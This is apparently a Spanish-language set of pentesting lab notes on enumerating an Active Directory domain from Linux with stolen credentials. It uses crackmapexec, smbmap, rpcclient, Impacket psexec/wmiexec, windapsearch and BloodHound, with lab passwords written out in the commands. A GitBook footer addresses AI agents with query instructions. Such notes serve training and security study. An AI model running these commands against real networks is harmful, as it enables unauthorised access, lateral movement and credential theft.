> For the complete documentation index, see [llms.txt](https://g4b0.gitbook.io/g4b0-docs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://g4b0.gitbook.io/g4b0-docs/documentation/active-directory/credentialed-enumeration-from-linux.md).

# Credentialed Enumeration - from Linux

## Crackmapexec&#x20;

#### Enumeracion de ususarios con crackmapexec

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users
```

#### Enumeración de Grupos

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups
```

#### Enumeracion de ususarios Loggeados

```bash
sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users
```

Observamos que muchos usuarios están conectados a este servidor, lo cual es muy interesante. También podemos ver que nuestro usuario forend es un administrador local, ya que (Pwn3d!) aparece después de que la herramienta se autentica correctamente en el host objetivo. Un host como este puede ser utilizado como servidor intermedio o similar por usuarios con permisos de administrador. Podemos ver que el usuario svc\_qualys está conectado, a quien identificamos previamente como administrador de dominio. Podríamos obtener una victoria fácil si logramos robar las credenciales de este usuario de su memoria o suplantar su identidad.

Como veremos más adelante, BloodHound (y otras herramientas como PowerView) se pueden usar para buscar sesiones de usuario. BloodHound es especialmente potente, ya que permite visualizar las sesiones de usuarios de dominio de forma gráfica y rápida de diversas maneras. Sin embargo, herramientas como CME son excelentes para una enumeración y búsqueda de usuarios más específicas.

#### Busqueda de shares

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares
```

Vemos varias carpetas compartidas con acceso de lectura. Las carpetas compartidas Departamento, Usuario y ZZZ\_archive merecen una investigación más profunda, ya que podrían contener datos confidenciales como contraseñas o información personal identificable (PII). A continuación, podemos explorar las carpetas compartidas y rastrear cada directorio en busca de archivos. El módulo spider\_plus rastreará cada carpeta compartida con acceso de lectura en el host y listará todos los archivos legibles. ¡Hagámoslo!

#### Enumeracion con modulo spider\_plus

```bash
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
```

En el comando anterior, ejecutamos el spider contra los recursos compartidos del departamento. Al finalizar, CME escribe los resultados en un archivo JSON ubicado en /tmp/cme\_spider\_plus/\<dirección IP del host>. A continuación, podemos ver una parte de la salida JSON. Podríamos buscar archivos interesantes, como archivos web.config o scripts que puedan contener contraseñas. Si quisiéramos investigar más a fondo, podríamos extraer esos archivos para ver su contenido, y tal vez encontrar credenciales codificadas u otra información confidencial.

```bash
head -n 10 /tmp/cme_spider_plus/172.16.5.5.json
```

## SMBMap

#### Probando acceso

```bash
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
```

#### Listado recursivo de todos los directorios

```bash
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only
```

A medida que la lista recursiva profundiza, mostrará el contenido de todos los subdirectorios dentro de los directorios de nivel superior. El uso de --dir-only solo proporciona el contenido de todos los directorios y no lista todos los archivos. Pruebe esto con otros recursos compartidos en el controlador de dominio y vea qué puede encontrar.

## RPCCLIENT

#### Enumeracion de usuario mediante su RID

```bash
queryuser 0x457
```

```bash
enumdomusers
```

## Impacket toolkit

#### Psexec.py

La herramienta crea un servicio remoto subiendo un ejecutable con nombre aleatorio al recurso compartido ADMIN$ del host objetivo. A continuación, registra el servicio mediante RPC y el Administrador de control de servicios de Windows. Una vez establecido, la comunicación se realiza a través de una tubería con nombre, proporcionando una consola remota interactiva como SYSTEM en el host víctima.

Para conectarnos necesitamos un usuario con privilegios de administrador local

```bash
psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125
```

#### wmiexec.py

Tras conectarse, se ejecuta como el usuario administrador local con el que nos conectamos (esto puede ser menos evidente para alguien que busca una intrusión que ver al usuario SYSTEM ejecutando muchos comandos). Este es un método de ejecución más discreto en los hosts que otras herramientas, pero probablemente sería detectado por la mayoría de los sistemas antivirus y EDR modernos. Usaremos la misma cuenta que con psexec.py para acceder al host.

```bash
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5
```

## Windapsearch

Windapsearch es otro práctico script de Python que podemos usar para enumerar usuarios, grupos y equipos de un dominio Windows mediante consultas LDAP.

Windapsearch ofrece varias opciones para realizar enumeraciones estándar (verificación de usuarios, equipos y grupos) y enumeraciones más detalladas. Disponemos de las opciones --da (enumerar miembros del grupo de administradores de dominio) y -PU (buscar usuarios con privilegios). La opción -PU es interesante porque realiza una búsqueda recursiva de usuarios con pertenencia a grupos anidados.

#### Domain admins

```bash
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da
```

#### Privileged Users

```bash
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU
```

## Bloodhound.py

```bash
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all 
```

* Rutas hacia Domain Admin: La consulta "Find Shortest Paths To Domain Admins" en BloodHound expone rutas lógicas (usuarios, grupos, ACLs, GPOs) para escalar privilegios. Es fundamental para planificar el movimiento lateral.
* Funciones clave de la GUI: \* Explorar las pestañas *Database Info*, *Node Info* y *Analysis* (rutas preconstruidas para tomar control del dominio).
  * Ejecutar consultas Cypher personalizadas desde la barra "Raw Query".
  * Ajustar la configuración visual y de depuración desde los ajustes (Settings).
* Siguientes pasos (SharpHound): La siguiente fase implica ejecutar el recolector SharpHound desde un equipo Windows unido al dominio y analizar esa data en la interfaz de BloodHound.
* Recurso recomendado (WADComs): Se aconseja utilizar WADComs, un *cheatsheet* interactivo excelente para consultar rápidamente la sintaxis de comandos y herramientas de enumeración en Active Directory.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://g4b0.gitbook.io/g4b0-docs/documentation/active-directory/credentialed-enumeration-from-linux.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
